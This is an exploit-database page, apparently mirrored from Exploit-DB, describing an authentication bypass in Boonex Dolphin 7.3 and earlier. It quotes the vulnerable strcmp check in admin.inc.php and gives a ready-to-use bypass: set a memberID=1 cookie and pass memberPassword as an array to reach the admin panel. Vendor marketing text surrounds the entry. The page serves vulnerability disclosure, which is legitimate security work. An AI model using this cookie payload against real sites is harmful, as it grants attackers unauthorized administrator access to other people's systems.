Lucene search
+L

Boonex Dolphin 7.3.2 - Authentication Bypass

🗓️ 26 Oct 2016 00:00:00Reported by Saadi SiddiquiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 43 Views

Boonex Dolphin authentication bypass through array input in memberPassword cookie parameter. Allows attacker to enter admin panel

Code
# Exploit Title     : Boonex Dolphin all versoin <= 7.3 Authentication Bypass
# Exploit Author    : Saadat Ullah saadi_linux[@]rocketmail.com
# Software Link     : https://www.boonex.com
# Author HomePage   : http://security-geeks.blogspot.com


Proof of Concept

File: admin.inc.php
Line: 187
Code: (strcmp($aProfile['Password'], $passwd) != 0)

$passwd is equal to Cookie parameter memberpassword

Bug:
According to PHP documentation strcmp will compare strings, but what if we provide an array???

So, simple bypass is to put two cookies in browser
memberID=1
memberPassword[]=blah --->array

This will allow the attacker to bypass the authentication and can also enter in admin panel.

#Independent Pakistani Security Researcher

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Nov 2016 00:00Current
5.3Medium risk
Vulners AI Score5.3
43